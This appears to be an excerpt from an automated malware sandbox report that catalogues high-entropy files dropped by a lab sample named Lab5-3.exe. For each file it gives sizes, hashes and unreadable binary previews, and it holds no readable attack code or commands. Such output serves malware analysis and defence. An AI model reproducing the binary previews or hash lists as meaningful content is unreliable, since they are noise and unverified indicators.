                                                                                                          Preview:u..R..4b<.....ro..0EG....7r....Q.@j}.p.2..........Ss....,....e....Ds.N.%...H.D..K ....\.B..|yW.M8.8.X.x.....T".$TvF....K...[.9...F<BTM~.i..-....q..^.L.0G7.._r}m.%....u.X...+.BR......$...[...\d...............U}Z...[.......j=</.~3a.oHbe...5........5.@:.(VQ...S.dlC..nua:..[....^c..<.{ .4uw.C6.<.xd8..8....&.<.+.c}.?...~....s.i.].....C....!....%].&.=/....a....V...b.Z.^G{!HN...q.u.o.....?Y....W8.g.V.......u..B.d..p.{.:......y.J.....9-k......&.K...Z)>.P.$.Y...s.,4.Hv.}.N...!z<R..l'.Y....U..._Z...'.[e.<L...I..j]..0O.gXGI.....#.3j.....;.9<..#...3..=.'.....&?*.....*.../=..o.5B...'..p.M".;.;%O..Eh.....m.F.i.'.i..:n.n..yu{...,(....=.......3..k.?......z|.sk.....'.'..h2..(0.s.....g.....?O..}~..>..$..7.Q\....|..AZv..e...2h...L......^86.H..c.cx.......A:@...5..F....s..9......n..$<...7.+......t..kW5j.&..n.{l...0...m.l."..W.%NII.C?!.."g...C.........".c..s[W...$.IX..0=.x.p..dN.I.3.....c......|......CK.....'..9.g.IbKt...t.X.r....GR..:i^XD&..a..^u.x
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.930054499819078
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:igZJ9C5vm8mi5XyWsTHWJvuiCwUykQXTpHfUTid3hBaUoSGFcmeykEdEElU92i:/ZzCFLXxCsvfCwiQXTqGx0uKeY2ElUJ
                                                                                                          MD5:3E05F4784CCA6DC7EB38B3463D069ADB
                                                                                                          SHA1:F97D5255F7D32A440801EB316440D4B3C6FD5030
                                                                                                          SHA-256:67C84B852CC09E598D2D69C455067C6455D598D1F634178A4B108F31BAECE844
                                                                                                          SHA-512:2A082CA3B6C2A5E5901CAF0D1E12AC79D3014FCFCBDC3BE1FCCED384008242C73A0D2B32B7D03D9B6132731854D89E97175AE49CF528A3B18743013598299A68
                                                                                                          Malicious:false
                                                                                                          Preview:?./HK..:ys............G=.QM.k]".....o.....-.U.Q.W...gwf.........Q..`..O.jT;^.....q..nF.I..$.Y.....A..yXs..c..Ds....;m..4uPZ|..l~8}..C|.t.....i..f;g.w.{.....[.i.y.....I..*........y.F.%......Y..0.P.V._...J/.k.....-!O.....0.K..\..n.[).H.Mml|)..S..4..Q.f.?=...B.XS;...aOk.V.u5#...wB*..!....(..P..5Y.a}........,.j.ViW....m.....J.S"\F..n.:.U..+..1.C.x....I.u..e...h.........C^n.9...r...3..#......C....DpnX.....A...y.^.....b......$A^.L..6...C{x..^......O....y..At.6`.......L{.#.....l|-z...|{..x......%...R...0f.#o..Ys..dH...i.|.P.;..<.zp.kA.......'......+}.{.W..J..2.....y.UL.:..R5..v.G..$I.!........<..........-Y..Z.).i...>.\.`Le...b.W..k0.....#k..f.0!L.a.....]..X.*....Zr.\.]6..wb......0=....i2.OkmiI...5........}..g..RU&.D...pwW....3V...p.<.+...z.u..[Gv....;`\......0b.(.M.n..U...j9.n~..?&&...c.U).wg.`...R&WW..Z/...8.?...-4.....:...v.<....[e..t..Ik...P.......KNS..6......i'..z|`...I.h.F.....T.-..k.....MJ..5......~..E.;9..Cx%....+...>.1`...5L.Y.y..ysy=..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.934519404292561
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:nXyMUl7QY0p9PKX5neg+IZDOU+iEiL6HfUTid3hBaUoSGFcmeykEdEElU92i:ncNQY0p1g+IZiU+i1LVGx0uKeY2ElUJ
                                                                                                          MD5:8A761067842F3C969438D28381622241
                                                                                                          SHA1:078A884CF96A18A3FD07744E299ACDBD771F3716
                                                                                                          SHA-256:C61B0AA25AB3DA29A93801564AE42627EB785B3EAF66A2B8FC0ACC5C20D6650B
                                                                                                          SHA-512:19842E881FA554192BDC20C7B09B4AB26F9005C95005EDEF0C1B34DBBF97EDD0AD8BEBFA94FE319CBEAFBF4FCFBB2D3235C4143831E34898C164CEB8F4EBE6C2
                                                                                                          Malicious:false
                                                                                                          Preview:..3..6"iqq.../<.l.T.h..3...V.c=g/....!....B.e....#T....uV...5~.n^.Xl....aV.H.M%..X.....Gm.;s.....%pN.[...{....{.Q.->.k^%^A'Ml.4...Z~.1.I...K...V&...{....'.6...&....cnNo.ZF.M.z..S.......Rs.!.jn..s..[.b.b.{\..f...YD.Y.\........n&y.8..`Y..M.b....6.,....>...a......:>yji_66<..o.,......../. /........A...D...*....`.v..........*.,....Y.._...a#..z...SY{%..[J)..mF...> c!...%!o..7X..-rD.=....^ .\..C.B.lzJv.|.|YK.w.Dt............8 [Z.J"#nheT..Jy.!aZ.[..|.(..X..+.......NEc..!....h...%.....i.......7N.`I..b........y...6....y.a.....s...?]..F.#whp..0..1.~.2Q.~....2.gL.X....?...w.t.i.....f.L6....F2H.....E.....u|?.....!..-....Yz.I`..*P/.0.d;.[.d.)9.R^#o...dd...ZM........tb..z.l`.x....<.w.a..P..i.M.D.E......Vw.`l>....,..H..."q.1]F`<.B....j....._.8..>.U[..=Ce-<..meQS........].-;.....?...p...].C..c..uV/.6....Qj0.!.UF-.&..T.J.....M...h...M..O.9...1.+......$#a.>..)..@...^$....J"f.VD...Q8.ls..k....&....8..Bw..M[.....doW.........;Y..n6;...}...(.9....g.{*...v. j.j
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.920914958153299
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:GymWSJ2WDWvzoInCHcQu4GRzoDiquiHfUTid3hBaUoSGFcmeykEdEElU92i:G4SUWivUIXjGx0uKeY2ElUJ
                                                                                                          MD5:8077B27300C23790301F69188483C740
                                                                                                          SHA1:855E30128307F38DFC635399B377B039796A90E5
                                                                                                          SHA-256:E7DB6686313FA729E90440699A0021DAA8340F437C6C4BFFDF51D67DAF8C19E1
                                                                                                          SHA-512:6BDFD2BEE2703DF125136BA4A14D49958FD971A9189A09DCB011757618847A9E043F27041FB7B32D77A35DB04571DEF3FF078601F06D80ECD568DDE4C98E484C
                                                                                                          Malicious:false
                                                                                                          Preview:....n$....v.....Gl...D.{...v..........X.=..[x.+. v.....s..$..u._..._m..K........j.H...@....aZ...m..:.......S.+M.....Q.L.W.5....x..."W{i..q;..(.q......]...bf.w.{.8.~+t.!...n....%..A\2.;e../.....sn.xSsz.}.z.s/.P...Q...O.).2B09....lX.|..6j.c0. .e......,yR,.U.!M.Da..E.*a...-..Y..0..U.f....E....."r....Ti._.`.)..3Y...T......k....,.6ge}.%...7........q..p.O.._..A..U.(..I.w.....Z.e....'P......X.a.....<.....5I...*..../@%..-d!......<|pL.H.zO.....&.&..Pg.q.*".....c.Rz.......ll.....@....(n.^..T.=.`L"..HX.....Ws....v.qN.m....Z..............@....|.....].>]...8.lz:'qo.FR<%...7..U|.....8..-2.I.....}...A..T....l:j....Q...#.i...d...AVIg.@E...sV..2..I.@qv...D..(.........v.AP{.b.....6...]...iI9.....X..|E..E......~f./=....mWXup.Z....S._+./V.<.....$.9.#D{...Z.K*`2.g...k].BM.......B..-.B...W#.:..OR.....<gIJ.sz.0...s.(t.R...\^.0+.......8.......d.2,?]..=%.,2.....M..P*.oB....c.bn..$.Cr....?.....m..\..FA.6H....c.g..........A./:....lzo/.....9...LSt}m.kxO..?.....].
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.940014314837863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:otU4um0rONBgVfwqyMggJcmJndqDaMJ0FaHfUTid3hBaUoSGFcmeykEdEElU92i:4uimPgaFJgDaMJ0rGx0uKeY2ElUJ
                                                                                                          MD5:5612CEF23030A51F7A907769D053C327
                                                                                                          SHA1:79BF65533F4422AD65EC7FA391075F7120D3262F
                                                                                                          SHA-256:4F31581AF79F4D84616579E650113541099195AAAE97043A9708E445147A87F2
                                                                                                          SHA-512:F805DB8093E6C04DF083B000E570D236F02B58038F9109B87A6EF53C3499BE78F192617D6507A6377F0EC02528B3B32326DB825E7FBA8A7FC8725BCB0D4D0BB4
                                                                                                          Malicious:false
                                                                                                          Preview:,.S..BC..(.CG'}{'.e....d..9......._2SY.%%(...T....N..<1.n.......j8..z...].fby....}%a..[.m..!+..}.0A6].w...<.w0.h)Uc.X...$\.-...ZFc...[..|q.'..V$}....>..._....".9........b.8..M.0....x...&e....*9..B..Z.=...... p(.'@..s....".>.8.f.)...v....<$F#....".(..U..J..W.e.........)xf<.\..&.y...)...&8-=.....:k.Tbr..s....Z~Ds7..|.@.t....!.V.....q3.&..DU......ia{.Mt..V!........S%y9...|..dx.......l..V..@-.e.M..v.......rw..$'.f..D-.D../`M.v..x.<......bN.%.....m..|$>.sY.s.Mo...?...G6.V.b..~.Y!.~...z..X...(f;;......T.q..O..e......I....g+A.....uu..5.hF?.@r..hh..Lo.w...F..J...&..W....E\......1&.(.P..d8b.M..dY...n=v....MU1..........}.U.....M.N..5...%J....]..u.#....;V[.."D@..(.<O.......E......HB..]T..7A.T1..k..u..4n.`.'eh..R.L..jY.........7...}...8H#;...Ak.......|e...R|R..!..03...<..k..hE]..>.]<......'..=s.TlIJ.._......$..X[Gr.F.B.Z....qx.F..u.zQ.mS.c.3...W...Gk.|...........qd.Mn.,._z.(.1~O...........$.CV.fX+......s.i(..;....Y...(.6..%_z2..U"^...p+N$...:;[\.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2784
                                                                                                          Entropy (8bit):7.936820809663467
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:8GEgy4l+mAAhBhMmCkGSSDa/yJHfUTid3hBaUoSGFcmeykEdEElU92i:879TmAAh7MXC6a/pGx0uKeY2ElUJ
                                                                                                          MD5:64CBA13892729B6AE54526AB1F42815C
                                                                                                          SHA1:F4953B58E569CED8135EC12684D6D6D89C1004BE
                                                                                                          SHA-256:09CE889EEB0AD9DA2FFBA390639921C1477D772C7F4B6CD124CCEC17C727B557
                                                                                                          SHA-512:F664144EB77F917E540F807247788F05993F39952F9298CA73F158076A80ECD9673E12E5F6F0128C8E07ED8126BB4F6671FE6144DEB8B5A2194FD52D07C8D7B2
                                                                                                          Malicious:false
                                                                                                          Preview:*./.r?.(.. }a..i.^1=[.K.....U....D....D?...,.J....\."..A...I;.D..z.X m..K.....&8*..|..!.]..ZE..z..7.?.w)..D4....j..^.pq.N..x.\;..b.=..>.'.|.?.NVAC.~.v.GM[....7>.(..?.?6....a.B_.._fB....7..y..C....P#C&..:C.s.9'...0... .NS.....K.E[.;..YS.....A.......^&*...s.x...gu....9W..8...g...|K..v....N...,qFGx.E..Y`.q{...XN..j.Q...P......I....4..e.N...G........)v.w..._.t.......i.\O..{K.....I.h...W..Lm4.k.[z_.Qg...O.a...K.....!?.../...Z....d.3~w"4.1....j|.IH}3.'....gn..#....*.4.\.lF..k..(.*...~k1L..)..t%n.3.H;P..FU8......@9.1.*....E..W...n.O,w...Z.\]u3.U..-.>Q^s{.n.MM/c.#.;.S`9F..5..#.#rP..3GT.8.[\..m...l(..\.Y.2n.......Z!e.....Ub.......3J..OKMu..I..#<.owj&..M..3.q%...-.5..Y).~.pt..a.U.T[.N.*..v.............#.*/...T....2....^.Ye.4'#H.S.7$-..S.2.....K.. rUTY......<6A8..DU,.33e9.&..;.(ygCW.0.3............YJ.J.(a}/7..8.............2t.+.H6...k\VqDZ....2>..{.O....-.f.|K...|.tu...........Ad5'...IuKdsy...R.....h=....P].g......0.Z.:SO.?[ U..x.m...N...`.k.20
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.933194261112794
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ZYbrJrlAPBS8m206x8siANHfUTid3hBaUoSGFcmeykEdEElU92i:ibrJZAPBS8HicmGx0uKeY2ElUJ
                                                                                                          MD5:BFEBEFB0F598EA7AC887FD1C9D52193E
                                                                                                          SHA1:D082D797D0575917B294E8903238D26F68EBEB6F
                                                                                                          SHA-256:20A9CAF39837592837F306E394EB554DBE0B17AD28FC58AF631A0545F62C87B3
                                                                                                          SHA-512:4AD56B1A25E02E5061F76E6C8024EB70A085A9D4A18FDBC2A06D05117B2D05FC0A220EF95786B49176B0841BDE515741C02D72B37B3C939E44CAB0498B5018C3
                                                                                                          Malicious:false
                                                                                                          Preview:AWy......]..N...L...q|....C...v..z..Lx$..)X!xS.9c......%..~.....7.....v] yghi..?.$7 ,.O{.%..2......k.;.4..9Y........}.....p.....[g.B..{,I).JA$...bW..5!...d...5.@..(.....n.v..4..Hd@.....e..Y..1..{-..B....J...m..N.2.]..^..M.....+U.Yk..(a.1>..e.%m.Z.....k.&..%....")..NV0....._CwR.u.2V...,....i...R..E>....S.1.S...I........[...Y......s.c..@..J...y.........G.,..G...5.m.`....|...p3..e.Z..'C.......n...T......o.....>.f..r.,0W.....gW.....c...K.W...R......( +..T.....V.C..'|...Q.UDA.^.j<..n.'.nUa...`....q../M...y....g.*lf..bR.W.+@..b.......!3D;......].1..."+e.8...e1.....2.p..~.......V......w.}F=$..^.-.!.W......TK,..-.C....H.V..T..K...OI.Q...*.*2.....G.?s__.#.6........>..*.p..u~.x.BiAqk.Qi.!w.u..i;.i..<.R.]..B(..yj<..cV..k..3....`...N..'.cY+fc.&.P.A.....w.;.n.W..b...\.^.k.......F...:..ik....)...A.=~4V.,.x...o..DF...M....M........A.c.R.."c...m.......h...R.B..x.r..a^.K.ts)......n".....]./f.....=C..-b9....k7R..2......m..2.y.....;...,,........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.933260619634916
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Ybz2jj7R/ACFnSzMQXvtrIbyzisHfUTid3hBaUoSGFcmeykEdEElU92i:AajKzVrIGOrGx0uKeY2ElUJ
                                                                                                          MD5:63E01CEEFBD68CDE44B5DE2B4655534A
                                                                                                          SHA1:2CCEF1C5ECFCBB9102D736A70414F18497DE3BA7
                                                                                                          SHA-256:906B835F7E074056F786525A1CFFCB2C0CCACC17CB8C5C2B540D50E9D82BC231
                                                                                                          SHA-512:20FF76C6B57B582FF7F88F490EFC94E487A756909D725ED3D846257D374B1F0EF930B75FBB7A33F1FEE4EF75FE93E8D4C65CC36D6F15AE2997D81A520FDDC149
                                                                                                          Malicious:false
                                                                                                          Preview:...-...!....R....v...>z...Z/R.9.}..[..2..9o....n=....Z..].b.P(P.1.$..FF......t.../.....<..Wje.....].49.. ]p.vn|....p.*L....d;.{/Zj$....R\.P.rH.>.$Pn.....h....%.M3..'a.B].P.{S.h...p:.M.\m.20....x ..9.}.F..!...%..".exN.&..B......Sj..Se....Q.M.P..U...^XKAt.7~...B......R..7..f...)f...FF2...u..f..z....hm..%...^.....JR.z..(A.ecW.'.......%...{.......x.....?...{/..........h.scl!`.....3.8.n.O.K<.p...a.-.Z91-N..g....:.R.N...[R..(%....uG...'u>o{c....W(.O..{..n........*P.._.....).M..xX...C.T....Jo.....{P.T..x.mWb=.E.....C.k. ET.X.F.v.....p..:|.....*.Y.......l),....c..(...DcF%.Y...p..|K....L2.......B.._a.?...*.6..loVS.w.....g..F.IqGGa.$~b-..e#.(..ZL+..._.....`.%..j`mYq......I.Nb."a.M..T/.er..$..[2.J..).m.7...8x.."....P..|.....b_g..>....p_*t.6..R..q.....^..Q..G.m.q.....L~!...=i....;......I.s.T.H.5...F....;...e.P..-=_V......H!.,..H....'.[...5P+......).b..L..D.............c...T.J'?#...;.V....p...+.......Oo....h..Y..WK.......a.h.F...,.....#..5=.J.6.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2480
                                                                                                          Entropy (8bit):7.923072742687977
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ElvWSrO22tj2ljoxg1MTmzwOujhbHfUTid3hBaUoSGFcmeykEdEElU92i:6qtj2ljoxg2TmhPGx0uKeY2ElUJ
                                                                                                          MD5:C59832EFB7E75EE1D3F627056101D3C4
                                                                                                          SHA1:59167AAAC9492B36FED152E45F799C64630A52D1
                                                                                                          SHA-256:E33D325CE58D594CC6063CB3102E6FFFF73EA65B997E816B3933644A6FE9AF84
                                                                                                          SHA-512:1A56EE81DDACF5CAD435669C77CE97118A952E42F6335F79B2CDF927AD17134165C7EDE63C568BF865D344348E84BE5574CD3D64E5030765871FCC09C2E64F54
                                                                                                          Malicious:false
                                                                                                          Preview:.x...iI.Rx}.nt.'..o".......S.!j.\.].>F.|.%............`.Y.*.c.HPQ,.K.~..Q.K}^.M.Y.d..Q...ET.s.d~..58>.Z....FB.a..9O...{?t4VhTh..h...EK}...Q=..Mr....|.8.R.O.....%........go...I=Y3d.._a.......#.e....c....j+].#........m8.&...kE..H.}....%.3.d..7.I...L.~..2..$xb/.D.-.(Q..SGx.JX....h.8x..H..}.TfB.N.../....D..cH K{..h..!.4....?.D2x...4..$p..V...vpo..s.....m1._.N...0?.."}.C....O*...7JK..B.n..N^.Up....z....q.>..\..G...4b...1.j.dm5Ijh*...!tG......W..I.k.x.........1YC...T...../..8.3.H..G.$iH.../Y.U....PT.....g......F..+g.....2.>p.!.-.tT..a.p..Sx.......P............n.o..UT|..m4....J*...8..c. .XA|.k.#...p_c...g.[..fhw.............c...A.;.,Ml:.......\.kt5K.<....G.g\..vY4....Cl"l....L.)._..6.k@..^J.g......^w.R~7..S4....bcb..~..z.....a]O.gQ....fb.......j.....,.).L..:..w...K.......[.._.8...jR...b....<.....S.._..f..*Kw.ft....i......7Z}..@.9..e..........+.."D>F..O......z....$b.D..:..M.7.q..= ..].$r.eD<.).2FN..F;....qV..j.........0=.fx..@.?.-..D.i...My.........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5104
                                                                                                          Entropy (8bit):7.967199404931684
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:vxck+pYPvjRc+sYkN9S1teGZkFT1786u0MsGx0uKeY2ElUJ:Ep2vjuB90tkFq6k0Cb
                                                                                                          MD5:4524A56FDBB05C68818346BFDFD17798
                                                                                                          SHA1:6E58485C358DF3825D38A0055A89CC6E9E08ED16
                                                                                                          SHA-256:56B6A6A61ADF965D84395E5D5DBCF2FCF09CC26B261A949D7EC28B713B36FAAB
                                                                                                          SHA-512:46040448ED0FEC4021687F65AC40BD0A8D060486D6CA741BA0F9066A93190131DF79D8F5B49BE57B2623DA0242BBFED1A3E8FD34F542024009B079DF00288794
                                                                                                          Malicious:false
                                                                                                          Preview:....f.b9*2VV......zN.y.x...]..|.C.....t.{'..f.v.*..U]CS..0d.).z....T.k..I."."......~#P@..tHZ...n..;.}......T.*....^.SXr`.....S..4..^..(..'...LY..D.....`.F.T..h.....K.(;."t.}l...?.\.#....LZ9R/..:4.P....5.....i.....mz?.k...]<j_....>...w.+$..-......en..s...s..ey7..AK.....[y<.....r...I\.g7..........g.L*...T...]..F1IF..\...-..O=.....@C.x....m.S.....RS..D.;...x..=_.U..B....Pe.......87.~..a...\~O$.q..j5vH.O..P*H..w.=...........4.o6ruA......{....&..4v..........o..uv..W....Jy..(c*`....k...{..$2=.r%..'.#.}..pWe.?.F`.L......m.3.y..QY%.*.3.P.O}....m.s....G.H..JY.........D.rS....3..+.....l.........6...)c.V.N..z.U.H........N.&}+......FQQ.]3.L.....y......k.,..F....,#....3Y.r..m..... ':.i.8.9..H....k....%..B6......8......<Y0+U..9..H..f....,...uSYVc.a.n..:.........v?'q.=.4...M..)e.......[RcC..e)\....Q....y.V.e. W.C....pS.6.r>*.....C..2...3..>.q.].1..k`C.[3.....Yoo..E.dH...?..b...ct.t...... .3",j..#......5..?.W!.....\P...5..e..q......D1.I^..-..Q!
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11360
                                                                                                          Entropy (8bit):7.985048546046259
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:QlwdJAQ96wRQjMUgHhfG8cVdZNYLL7We2oQGiquQ+VPs8HvpOug0nq70Cb:ZbRocoxwhfG3HN27We1ni9hVNP75q7tb
                                                                                                          MD5:7BAC021CDABFD40FAA245A870EE420BD
                                                                                                          SHA1:3059DEDEF7D6A62B4C084B162E61B5553230A7CF
                                                                                                          SHA-256:EB658712DD979EC6111AC44B924791DB69E4DDB95310917E7AF1F0F0D81CB7AA
                                                                                                          SHA-512:FECA295E438EE26C72B5D4186FFC294799A84B15B85AD8EEBB0EE7088ECC2D7800C6596DEE272F0A1591B25EEA7E85686599C89BECA3187ABA9183B36B42BFC9
                                                                                                          Malicious:false
                                                                                                          Preview:,..~.]..Nd:..B6..W..=.g(.SYX......%cM...V"+yS...p.K....x...pnZV^..-.n...&@.,qx..q.....+RvD2[.6..1.l.1...dG1.0....2_..4..!r..xf.!..qV.....o..ijL.....8.9^...U..Zbw..7.8O*..$.k3.].1h.HW.~.^R....R+......9B...-I...|`...h....y...cR..8`......O...-...9TT{g.w.{......3..p....%L..~..,4i.&....^..a......$......Y.A.Y....... ......n..... ..VFT..z.qq.w..WNg..{N1.HZ.k.Qo.......(.B....q...@......v...*U.e.Ip..ob.|...Z*.9..w]6.S.M....P...u..y@.......p.R8..PI-".....3:^.'...T...p.}..g.l.;Z].B.3.....v.E_7......X.....{..3*+..|.+.m..B!...q..AU%.G.\ya.hH.t.5X...)'.....S.....O<..%....mM.......'.Z.@....h....B..b....5e,2-..............)..;......o.OO..d.q..iZ.%.......q...R.......Bn. .s...1v.X)I.....G.8O..=..K....^..S4..<..`U.....@@...r......l....?.Q..l..{E.3.....)....#h....b.&>h ".....$....qM.....n...p~(.....p..cO.>....5.fZ. .Mn.,R.uO...wa).|.T.A..k.&Zt........%.xU.<.........FI5.5=.E.......x.h.[......m...>......V.yR=..fm..Xy)....~.}....t..MV04-..w..*Y7..QE.Zw.s..A..t...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6272
                                                                                                          Entropy (8bit):7.969635273402505
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:M9QglELvp5/bf2nC5rSLNS5gPVRU9/WSgKfMSNpYOyBeQ4Gx0uKeY2ElUJ:M9HlELL/yCSxSMHhS/hyBz70Cb
                                                                                                          MD5:E96D004BD2A4CFFE9BA9D9C3D208E4FF
                                                                                                          SHA1:42FACF3F5FEF16DBC793DD218DC17632E85EC7BE
                                                                                                          SHA-256:99E59056C9C77FED08A5B400108C3A1CA3DB098FDF31120E2F1E52738554690C
                                                                                                          SHA-512:5F1B336B75A4738EA42865AE43017A24F41A3EF0222C7AD248293533C74254C0395B12A646D3BFB2799DCB52F54E08BCE417CDEB212EF1A4ED6ACCE484612096
                                                                                                          Malicious:false
                                                                                                          Preview:.rG..kK.A....h9../D.~0...#.o..{(...EOi......X.cn.>.K,....Y...42b.O1V%.%.D!...u.@..o......0...V.$rW..K.l.0u..D....*v...>.......Y.$y.....F.&.s..;s.....w.....gK..J...Kt.5.r..R.c.H..~..\..,..y.z..F.k.K.N...;N..M...c+.8.z....(q&.gW....b.1Ez.L...T..q...t..L....".c1....v.C(.%&.s.=.....n"...O,..W.`.#._......X..)....kt=....0s.+....v3{{.3.hN.n.2.~...p..;L.~.vL....xy..5....`9.D.Q...&&...I..v.......(.w..!t3./._.m......;.i,..).'.p...#.,o...rkE[G.A$^;.\.'..S.u.......DzBD..(...,N..6t.2.j.1.8.{....+Ud....tEG...!.2..<\TV*.. .^....R.......t..K..N.....Ag;U............O.%F.................[.K.../V.xZ.J_|.'.m.[.^.\......x.?'K.x.^...|]G.............. .z..YJ-.`Py."....k<@...?Q.Y.2c...v..5..{.....B.......iZ.I...9....bc-d..U...+....e*...qg...S<..-...C...ku......>.....@tqm(J....GA..^.........B.....@a.j...........m.j.*.."`.Z.E..F.3.j...{I.D{.,.]...|..G.m(.....gB=U..]D.G..:.+y.."3.iZtD...a..d...a`2.....Z.s...I........bv..|..9{.../......(....f....Z0....<\...UW..Ex...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.932269458165985
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:EWk2PXT7rsvsFRU6F87Z5gkHfUTid3hBaUoSGFcmeykEdEElU92i:E7IH0sP58V5gjGx0uKeY2ElUJ
                                                                                                          MD5:C099B63F26E0865570F288750376FCDC
                                                                                                          SHA1:9ED42F6742F8259032202EE3891496044ED91E05
                                                                                                          SHA-256:8FB378C436839AEDD68DF3CCE5B007425A372EA39B1266EA83753D625376F95E
                                                                                                          SHA-512:1422345D8B0CBE377B4E630CC865ACEDF489B2300C419A52C5314164C1D5B85DEB83D77C5BAFC9784D41EEE48DD2DCF4B6EC186FDED284F9191509509CE40A1A
                                                                                                          Malicious:false
                                                                                                          Preview:...~..8....h..........?.n...'..0<.%.I....c....M.H..F..S.)..g.*^.....1.O`.J,t.0....+iQ.n ...-;A.ctmTf.3rK...8.I..Q.&^..5.K.G. ...}..3..........kb.\.>..A.>x..,..G.. ..h..H%..(. ...^..E....,.O...U.YX.L.L...e.)1B>.m.<:_.....0....&y.tvxd...}.-O#.,l..^...h.E...'hZ..).......>...>.....nh!A|S.W.7*......y._Cz.o..c=.g....B.PC.3l.=H.o7.5....Z.u.JxR&Z.r.tkB.H~i..m.r.f......s..X}..D...<NE,k..Z...o..*O..UL_.t6}.*s.4\CV...s..[.Wa...h.K*0..O+..G..W...O..l6..S..l.Up.c........k(.....h..Vz.:.=..FX.9.L........U.y...Z....~..t.C.r..>S.,..Y.G.....x~.~...a=..~H..!..`...1.N~6..?L*gd...e`.._.0..B.K..4.......,Ng7...+.~........X3..<.-E.2y..R`.D^..r.......5*.JOv....,U{.`..W..Ys&...i........I..t._f..*..S.S$.Si.xb....w..7V'..p.$...]oz..?.?48p.l..f..j.w....@.....il...R.$g.7.H.e1v..|...P...Y(.s.!..o..|...#xmN.&Y{.d...@.16rY...B<..7k...i...l4t4/...\.L...+..?dq.g.....u....H.....3.R....vKSl.'..P....q}.....B...ZL.......%..||+.G..3...,.:/.,.rVh{.[..!.>...Z.c........!.G....#w.2.h..N...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.912921285346097
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Eo+Z9uX4g91dsRWaHfUTid3hBaUoSGFcmeykEdEElU92i:THIg91CRkGx0uKeY2ElUJ
                                                                                                          MD5:D34D27CA53A8480C6FB3C924FC0BA40C
                                                                                                          SHA1:25164BFB82FED89E22F7749792000F8F8F8AA7C8
                                                                                                          SHA-256:334515E827FA4216976CCF2153A22881355C3FBC2D0027FED1437D5A70601D84
                                                                                                          SHA-512:F04D74183F260F2CD90CD9A25417527F415997BA68090C7A1B20B2A3F8E3CD110430723E84FEB90DF2435480E769EC5DC827CC3F2978977D851E6AFA2C3D6FE2
                                                                                                          Malicious:false
                                                                                                          Preview:.qc.H...H.....T{C.....%..2..|.8s)m...*.* 4/}f..|.w:..7..........fuZ.g...DC...(P..<IY.....d._.....t.*..C..Lw.J.iQ...7...a..|.... ..6...A.0.L.XJ.....9.q...e..o...<....N.V.s.E.i(pA....,..`{.h/.=@n.(7..,/....D.M......@hy..&...g..:.1!e....I.....A.<...<x......1.A...gS....$..$..U.....?r..b.6...H+.b|f..7o=>'a7...7|...*.....$e...D=...fXd..-.}Y..K.......K\.b@.....e...I..".mM."1..xgeZ.:..V..(d.($.U~...y0.:@b......9.K.5X}...t.."......>.6*..(...X.....g.S.f.d.J..M.b#.f.:.._.9..S4.h..IT.;_J.cId..4....0..V...$\...u!...NT...R..`.UQ.E...~>@.e....{.*9......y...X..8=b.&..-.....l8.h=...(..J..L......"....f\.\.)..{.)GG...E[.c$i..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.92651020093574
                                                                                                          Encrypted:false
